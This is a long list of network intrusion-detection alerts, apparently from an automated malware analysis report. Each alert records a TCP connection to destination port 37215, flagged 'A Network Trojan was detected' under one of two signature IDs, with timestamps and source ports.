                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207017
                  SID:2829579
                  Source Port:39050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849497
                  SID:2829579
                  Source Port:38494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651235
                  SID:2835222
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357505
                  SID:2835222
                  Source Port:54446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.405672
                  SID:2835222
                  Source Port:42338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.345555
                  SID:2829579
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.990716
                  SID:2835222
                  Source Port:48222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.762956
                  SID:2829579
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996521
                  SID:2835222
                  Source Port:53252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.305234
                  SID:2829579
                  Source Port:43436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.469991
                  SID:2835222
                  Source Port:37668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.193253
                  SID:2835222
                  Source Port:52076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.299402
                  SID:2829579
                  Source Port:55090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.471512
                  SID:2835222
                  Source Port:41966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083143
                  SID:2829579
                  Source Port:55396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174460
                  SID:2835222
                  Source Port:41270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.169661
                  SID:2829579
                  Source Port:51232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988171
                  SID:2829579
                  Source Port:38960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598078
                  SID:2835222
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.926462
                  SID:2835222
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867822
                  SID:2835222
                  Source Port:49224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.967087
                  SID:2829579
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875738
                  SID:2835222
                  Source Port:52782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.368181
                  SID:2835222
                  Source Port:57860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.547112
                  SID:2829579
                  Source Port:57512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.893160
                  SID:2835222
                  Source Port:34276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.914560
                  SID:2829579
                  Source Port:56286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.557842
                  SID:2829579
                  Source Port:38522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.385136
                  SID:2835222
                  Source Port:49424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.068814
                  SID:2829579
                  Source Port:57460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419623
                  SID:2835222
                  Source Port:36632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.185788
                  SID:2835222
                  Source Port:34598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.817964
                  SID:2835222
                  Source Port:55860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996521
                  SID:2835222
                  Source Port:37236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.528583
                  SID:2835222
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.577578
                  SID:2829579
                  Source Port:53928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019424
                  SID:2835222
                  Source Port:42686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099427
                  SID:2835222
                  Source Port:43882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.732264
                  SID:2829579
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093550
                  SID:2829579
                  Source Port:56790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.290002
                  SID:2835222
                  Source Port:39722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.828817
                  SID:2829579
                  Source Port:38650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860875
                  SID:2835222
                  Source Port:56948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472929
                  SID:2835222
                  Source Port:36626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.440990
                  SID:2829579
                  Source Port:34852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.296464
                  SID:2829579
                  Source Port:46408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2835222
                  Source Port:60372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.623017
                  SID:2829579
                  Source Port:49290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.279073
                  SID:2835222
                  Source Port:57058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2829579
                  Source Port:43004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.248893
                  SID:2829579
                  Source Port:52052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2829579
                  Source Port:47340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481164
                  SID:2835222
                  Source Port:37730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.150508
                  SID:2835222
                  Source Port:55848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918908
                  SID:2829579
                  Source Port:40230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.141329
                  SID:2835222
                  Source Port:50090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942038
                  SID:2835222
                  Source Port:46424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.421693
                  SID:2829579
                  Source Port:38062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610394
                  SID:2835222
                  Source Port:39652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.771249
                  SID:2835222
                  Source Port:33380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328619
                  SID:2835222
                  Source Port:60720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.713001
                  SID:2829579
                  Source Port:34484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2835222
                  Source Port:35758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.582733
                  SID:2829579
                  Source Port:58390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2829579
                  Source Port:58350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.299447
                  SID:2829579
                  Source Port:34640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.759020
                  SID:2835222
                  Source Port:34692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.528499
                  SID:2829579
                  Source Port:34244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.531286
                  SID:2835222
                  Source Port:45672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.887969
                  SID:2835222
                  Source Port:45962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.009687
                  SID:2829579
                  Source Port:48978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.168081
                  SID:2835222
                  Source Port:33152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523968
                  SID:2829579
                  Source Port:44090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565170
                  SID:2835222
                  Source Port:38248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.574488
                  SID:2835222
                  Source Port:33264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.781764
                  SID:2835222
                  Source Port:49248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.020494
                  SID:2835222
                  Source Port:50124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.779389
                  SID:2835222
                  Source Port:51526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.171262
                  SID:2835222
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2835222
                  Source Port:58142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:55548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189760
                  SID:2835222
                  Source Port:60902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.533121
                  SID:2835222
                  Source Port:43808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881196
                  SID:2835222
                  Source Port:58874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2829579
                  Source Port:41744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.999763
                  SID:2835222
                  Source Port:54240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171769
                  SID:2829579
                  Source Port:44082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.145980
                  SID:2835222
                  Source Port:40186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.318563
                  SID:2829579
                  Source Port:51624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.890895
                  SID:2829579
                  Source Port:36526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177796
                  SID:2829579
                  Source Port:44894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350374
                  SID:2829579
                  Source Port:49874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976551
                  SID:2829579
                  Source Port:33934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.457680
                  SID:2835222
                  Source Port:42930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766311
                  SID:2829579
                  Source Port:53426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.326882
                  SID:2829579
                  Source Port:51568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.829275
                  SID:2835222
                  Source Port:55854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.508091
                  SID:2835222
                  Source Port:53732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.062166
                  SID:2829579
                  Source Port:38640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305331
                  SID:2835222
                  Source Port:59526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.661984
                  SID:2835222
                  Source Port:58078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.808476
                  SID:2829579
                  Source Port:57216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254680
                  SID:2835222
                  Source Port:37816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.559919
                  SID:2829579
                  Source Port:47050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.603648
                  SID:2835222
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.269979
                  SID:2829579
                  Source Port:58064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411416
                  SID:2829579
                  Source Port:51922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.576651
                  SID:2835222
                  Source Port:60228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.988913
                  SID:2829579
                  Source Port:51662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.493040
                  SID:2835222
                  Source Port:44708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.128635
                  SID:2835222
                  Source Port:45410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878204
                  SID:2829579
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.084495
                  SID:2835222
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600322
                  SID:2829579
                  Source Port:37518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912648
                  SID:2829579
                  Source Port:58364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.938388
                  SID:2835222
                  Source Port:56788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.451906
                  SID:2835222
                  Source Port:53810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.151142
                  SID:2835222
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005613
                  SID:2835222
                  Source Port:59346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.168343
                  SID:2829579
                  Source Port:51566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:39072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568128
                  SID:2835222
                  Source Port:35200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.989706
                  SID:2829579
                  Source Port:38700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.365413
                  SID:2835222
                  Source Port:37630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005447
                  SID:2829579
                  Source Port:41324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828084
                  SID:2829579
                  Source Port:32990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.286064
                  SID:2829579
                  Source Port:60864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385605
                  SID:2829579
                  Source Port:42832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560795
                  SID:2829579
                  Source Port:55420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.949660
                  SID:2835222
                  Source Port:49094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.443855
                  SID:2829579
                  Source Port:55334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.900860
                  SID:2835222
                  Source Port:57848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2829579
                  Source Port:36724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.577578
                  SID:2835222
                  Source Port:54254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.942019
                  SID:2829579
                  Source Port:53678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.901812
                  SID:2835222
                  Source Port:54854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.858837
                  SID:2829579
                  Source Port:59452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.824245
                  SID:2829579
                  Source Port:40914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069950
                  SID:2835222
                  Source Port:33850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.804937
                  SID:2829579
                  Source Port:56054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.880964
                  SID:2835222
                  Source Port:37438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529436
                  SID:2829579
                  Source Port:35672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.428149
                  SID:2835222
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.605859
                  SID:2829579
                  Source Port:57914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.714271
                  SID:2835222
                  Source Port:55710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.871507
                  SID:2829579
                  Source Port:39418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850183
                  SID:2835222
                  Source Port:46054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2829579
                  Source Port:45076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.190892
                  SID:2835222
                  Source Port:39262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.317209
                  SID:2829579
                  Source Port:39030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.819391
                  SID:2835222
                  Source Port:41848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177669
                  SID:2835222
                  Source Port:33894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.534689
                  SID:2835222
                  Source Port:45820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.780435
                  SID:2829579
                  Source Port:55590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.314829
                  SID:2835222
                  Source Port:49924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124417
                  SID:2835222
                  Source Port:50780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467613
                  SID:2835222
                  Source Port:59036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.528141
                  SID:2829579
                  Source Port:47708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406551
                  SID:2835222
                  Source Port:48356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.831201
                  SID:2835222
                  Source Port:37640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.583179
                  SID:2835222
                  Source Port:46832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867068
                  SID:2835222
                  Source Port:56722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.574488
                  SID:2835222
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915892
                  SID:2835222
                  Source Port:55982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453421
                  SID:2829579
                  Source Port:43924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.545208
                  SID:2829579
                  Source Port:33540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019292
                  SID:2835222
                  Source Port:56076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994983
                  SID:2835222
                  Source Port:39742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.948023
                  SID:2835222
                  Source Port:35812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739643
                  SID:2829579
                  Source Port:54892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.285291
                  SID:2829579
                  Source Port:58558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.344618
                  SID:2829579
                  Source Port:57274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361237
                  SID:2835222
                  Source Port:42858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.559521
                  SID:2829579
                  Source Port:51812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828226
                  SID:2835222
                  Source Port:47216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:53164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013451
                  SID:2835222
                  Source Port:35344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.112995
                  SID:2835222
                  Source Port:42574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744457
                  SID:2829579
                  Source Port:38046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165821
                  SID:2835222
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.987435
                  SID:2835222
                  Source Port:36402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088897
                  SID:2829579
                  Source Port:43252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.952903
                  SID:2835222
                  Source Port:58180
